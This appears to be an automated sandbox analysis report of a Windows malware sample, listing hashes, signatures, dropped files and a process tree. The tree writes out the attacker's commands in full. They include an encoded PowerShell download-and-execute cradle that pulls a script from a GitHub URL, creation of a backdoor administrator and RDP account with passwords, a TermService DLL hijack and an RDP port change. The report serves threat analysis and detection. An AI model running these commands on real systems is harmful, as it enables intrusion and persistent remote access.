Analysis

max time kernel: 57s
max time network: 124s
platform: windows10_x64
resource: win10v20201028
submitted: 06-11-2020 11:31

Static task: static1
Behavioral task: behavioral1
  Sample: 8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe
  Resource: win7v20201028
Behavioral task: behavioral2
  Sample: 8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe
  Resource: win10v20201028

General

Target: 8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe
Size: 3.5MB
MD5: 62e859cf533b93d38a05a2490b65fdf4
SHA1: 85098ce68d91cd54795beca743c7de06b546997c
SHA256: 8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d
SHA512: 3b90b0d2bc04c21be9b5330d5fccea3708b699c3fa054c90acf89e363ea8f97def8d2cb3ee938139596293e58ef727d27cda3add8c46caf8eddcd8b75494c479
Malware Config

Extracted: https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1
Signatures

Grants admin privileges (1 TTPs)
  Uses net.exe to modify the user's privileges.

Blacklisted process makes network request (9 IoCs)
  Processes:
    flow  pid   process
    23    2296  powershell.exe
    25    2296  powershell.exe
    26    2296  powershell.exe
    27    2296  powershell.exe
    29    2296  powershell.exe
    31    2296  powershell.exe
    33    2296  powershell.exe
    35    2296  powershell.exe
    37    2296  powershell.exe
Modifies RDP port number used by Windows (1 TTPs)

Sets DLL path for service in the registry (2 TTPs)

    resource                        yara_rule
    \Windows\Branding\mediasrv.png  upx
    \Windows\Branding\mediasvc.png  upx
Deletes itself (1 IoCs)
  Processes:
    pid  process
    760  powershell.exe
Loads dropped DLL (2 IoCs)
  Processes:
    pid   process
    1124  1124
Modifies service (2 TTPs, 2 IoCs)
  Processes:
    Key created      \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\parameters  [reg.exe]
    Set value (str)  \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"  [reg.exe]
Drops file in Program Files directory (4 IoCs)
  Processes:
    File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT  [powershell.exe]
    File opened for modification  C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI  [powershell.exe]
    File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT  [powershell.exe]
    File opened for modification  C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI  [powershell.exe]
Drops file in Windows directory (19 IoCs)
  Processes:
    File opened for modification  C:\Windows\branding\ShellBrd  [powershell.exe]
    File opened for modification  C:\Windows\branding\mediasrv.png  [powershell.exe]
    File opened for modification  C:\Windows\branding\wupsvc.jpg  [powershell.exe]
    File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive  [powershell.exe]
    File created                  C:\Windows\branding\mediasrv.png  [powershell.exe]
    File opened for modification  C:\Windows\branding\mediasvc.png  [powershell.exe]
    File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_uar3d2vs.yqu.psm1  [powershell.exe]
    File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB4F.tmp  [powershell.exe]
    File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB5F.tmp  [powershell.exe]
    File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB90.tmp  [powershell.exe]
    File created                  C:\Windows\branding\wupsvc.jpg  [powershell.exe]
    File opened for modification  C:\Windows\branding\Basebrd  [powershell.exe]
    File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_e2gabyxh.qor.ps1  [powershell.exe]
    File opened for modification  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat  [powershell.exe]
    File created                  C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log  [powershell.exe]
    File created                  C:\Windows\branding\mediasvc.png  [powershell.exe]
    File created                  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP  [powershell.exe]
    File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFAE0.tmp  [powershell.exe]
    File opened for modification  C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGIFB7F.tmp  [powershell.exe]
Modifies data under HKEY_USERS (217 IoCs)
Modifies registry key (1 TTPs, 1 IoCs)

Runs net.exe

Script User-Agent (4 IoCs)
  Uses user-agent string associated with script host/environment.
  Processes:
    description             flow  ioc
    HTTP User-Agent header  27    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header  29    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header  25    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
    HTTP User-Agent header  26    Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Suspicious behavior: EnumeratesProcesses (9 IoCs)
  Processes:
    pid   process
    760   powershell.exe
    760   powershell.exe
    760   powershell.exe
    760   powershell.exe
    760   powershell.exe
    760   powershell.exe
    2296  powershell.exe
    2296  powershell.exe
    2296  powershell.exe
Suspicious behavior: LoadsDriver (2 IoCs)
  Processes:
    pid  process
    628  628
Suspicious use of AdjustPrivilegeToken (77 IoCs)
Suspicious use of WriteProcessMemory (72 IoCs)
Processes

Process tree as recorded by the sandbox; the bracketed number is the nesting depth, "cmdline" is the command line observed, and the indented dashes are the signatures matched by that process.

[1] C:\Users\Admin\AppData\Local\Temp\8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe
    cmdline: "C:\Users\Admin\AppData\Local\Temp\8f7dbcfa8bad037d11b43554acc4d273413a2aad3d0d0f18b0ef44ed353d6f0d.exe"
    - Suspicious use of WriteProcessMemory
  [2] \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      cmdline: -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      - Deletes itself
      - Drops file in Windows directory
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\a3ddszbn\a3ddszbn.cmdline"
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7535.tmp" "c:\Users\Admin\AppData\Local\Temp\a3ddszbn\CSCA2DC19026E8B41EA9CABCCAEBB4AED5B.TMP"
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        note: 0x1C21 is decimal 7201, so the RDP listener is moved off TCP 3389.
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        - Modifies service
        - Modifies registry key
    [3] C:\Windows\system32\reg.exe
        cmdline: "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
    [3] C:\Windows\system32\net.exe
        cmdline: "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\net1.exe
          cmdline: C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start rdpdr
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start rdpdr
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start rdpdr
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\system32\cmd.exe
          cmdline: cmd /c net start TermService
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\system32\net.exe
            cmdline: net start TermService
            - Suspicious use of WriteProcessMemory
          [6] C:\Windows\system32\net1.exe
              cmdline: C:\Windows\system32\net1 start TermService
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
    [3] C:\Windows\system32\cmd.exe
        cmdline: "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user wgautilacc Ghar4f5 /del
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user wgautilacc Ghar4f5 /del
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user wgautilacc uM6Ul3PI /add
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user wgautilacc uM6Ul3PI /add
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc uM6Ul3PI /add

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe LOCALGROUP "Administrators" wgautilacc /ADD
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd /C net.exe user wgautilacc uM6Ul3PI
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\net.exe
      cmdline: net.exe user wgautilacc uM6Ul3PI
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc uM6Ul3PI

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic path win32_VideoController get name
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic path win32_VideoController get name

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C wmic CPU get NAME
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\System32\Wbem\WMIC.exe
      cmdline: wmic CPU get NAME
      - Modifies data under HKEY_USERS

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    - Suspicious use of WriteProcessMemory
  [2] C:\Windows\system32\cmd.exe
      cmdline: cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
      - Suspicious use of WriteProcessMemory
    [3] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        cmdline: powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
        note: the -enc argument is the UTF-16LE base64 encoding of IEX (New-Object Net.Webclient).downloadstring("https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1"), the URL listed under Malware Config.
        - Blacklisted process makes network request
        - Drops file in Program Files directory
        - Drops file in Windows directory
        - Modifies data under HKEY_USERS
        - Suspicious behavior: EnumeratesProcesses

[1] C:\Windows\System32\cmd.exe
    cmdline: cmd.exe /C net user wgautilacc 1234
  [2] C:\Windows\system32\net.exe
      cmdline: net user wgautilacc 1234
    [3] C:\Windows\system32\net1.exe
        cmdline: C:\Windows\system32\net1 user wgautilacc 1234
Downloads

C:\Users\Admin\AppData\Local\Temp\RES7535.tmp
  MD5     623f8149392a752360685aad9197c7ca
  SHA1    0560b55d276649309224e59b75eb339bf92f0d7b
  SHA256  36f84235392d010b75a44ede7c5ef848ead501e8268b0fafe0c25c7850d93c78
  SHA512  a8972114dfe95b71b12090998ce4272f5f53f64a581c9dd194ac7b9d043e3fd29cde4c54efcb36a27895278c801f27338ab3303edc25eaa8e8f9ef361e781159

C:\Users\Admin\AppData\Local\Temp\a3ddszbn\a3ddszbn.dll
  MD5     44c73405b93cd7a563864bd0e91ce826
  SHA1    c004019a330c66edb082920a7dfbd8345471d82b
  SHA256  2981692ab2abfbbcdb322ba059098baaa2f54f67aa9915ad7957ae0f585fb777
  SHA512  a2b1c14463da1314e3b6361231da8796fad61f2dd39eded562d60e4d46cdd5acdbfc01e4d14764b7a7fc3064e10e23b174819a457c42fa2a5eeae30cdca5e800

C:\Users\Admin\AppData\Local\Temp\get-points.ps1
  MD5     bcac3bbb18f093dbc8e5e76d2675695f
  SHA1    96453f65b41e428937349e6f48fe67d6dfd6a580
  SHA256  b25768626991b9a33e3ada79e3beb92fa5d83e1b50f2820e6fa2d6cf4827b21a
  SHA512  78c55502c7d0484b458fadb78bc075b8eda01b794e2037283df11dc58105bd632c0e747e92fd7aac7b79c5ac0ddce9bb2c6e7ce158c743c9f080a52eda0498ab

C:\Users\Admin\AppData\Local\Temp\get-points.zip
  MD5     42c2a160d2d191e6ffcc1076b4734ee2
  SHA1    c8a71ddb77c6bad039fbb041bbf7ea2021ca9d49
  SHA256  2b8aebe68161f07e7029bac05eeeb009455553731baf60b447d0d4aaa9fded99
  SHA512  3b9de3ad6cbe4db3958564b4bd37a45e6aa3a62a4a6e6756d6e997a9cc9c2dca31053e9e0aa300c1660b72332eb1f677f6b65762825ac68a99a55d06043e0939

\??\PIPE\lsarpc (hashes are those of an empty file)
  MD5     d41d8cd98f00b204e9800998ecf8427e
  SHA1    da39a3ee5e6b4b0d3255bfef95601890afd80709
  SHA256  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
  SHA512  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

\??\c:\Users\Admin\AppData\Local\Temp\a3ddszbn\CSCA2DC19026E8B41EA9CABCCAEBB4AED5B.TMP
  MD5     e491d8b5376c80a6a5c8546c6f35778e
  SHA1    f399519591cada20e4841468ffeec82295ec7c14
  SHA256  b758abe5750ab5cf9ea05fd45a6faf5e38820466d2ca168b15015aaf0614a5b9
  SHA512  6eb0c90f95a357c04221661da666d55b6c517dec806ba31dcc2cdd1892c32b183cdefce1a1ed66bc7ea2ddfabfbc7a6ae9bcf8b25d1609db6fe336ff80201271

\??\c:\Users\Admin\AppData\Local\Temp\a3ddszbn\a3ddszbn.0.cs
  MD5     6f235215132cdebacd0f793fe970d0e3
  SHA1    2841e44c387ed3b6f293611992f1508fe9b55b89
  SHA256  ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec
  SHA512  a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

\??\c:\Users\Admin\AppData\Local\Temp\a3ddszbn\a3ddszbn.cmdline
  MD5     20c1eda5fbd9c49c273416c2922aa7ed
  SHA1    ba0c5ccffa5c1bee73e0d81b8fc2f0deb9c7b133
  SHA256  1df07f4ff66b20617de825bb346218701eb6b1b3e48696ccaab8125b32609cbd
  SHA512  c38b96823a2a0377b03f280c732765cd6976e18080159194a406f6c8a72ba43d289d1c29efa5ee5b76776a91a1f734d7c06e3112e1bd1bd004486f9f2fb20c92

\Windows\Branding\mediasrv.png
  MD5     f357d4e7b83bc0a41c65d97f3e6f50f4
  SHA1    71db3180a8ada6d5d7722c54a5940c3490f78636
  SHA256  db0b525a0871cd413d9e1e4a31568b10344aa996823a22e85179ea4dab11afba
  SHA512  566bc45578f2754b4330fc2721d24aef95ae25ef258d56b00c8cb585061f89386a5d27245d301ea0d479797a42f0487605c294008a6d33559634b5e35f4b4e8e

\Windows\Branding\mediasvc.png
  MD5     d5de6f599d9807bac2f5a8e751a8c38f
  SHA1    9e70edf56b6a5768fda84232e9c557e750d3631b
  SHA256  18207938b456352ad540ed62fb113b7b11025a6d2b1de08728772c24c8553fca
  SHA512  e526e3a75be31762bb5fc01f4450ff48391fe36a1e71aef6a89d3f262e523e2f7654501f43667a3e982a05835418e72ae26ec3ba955b8537a700e69e82337fc5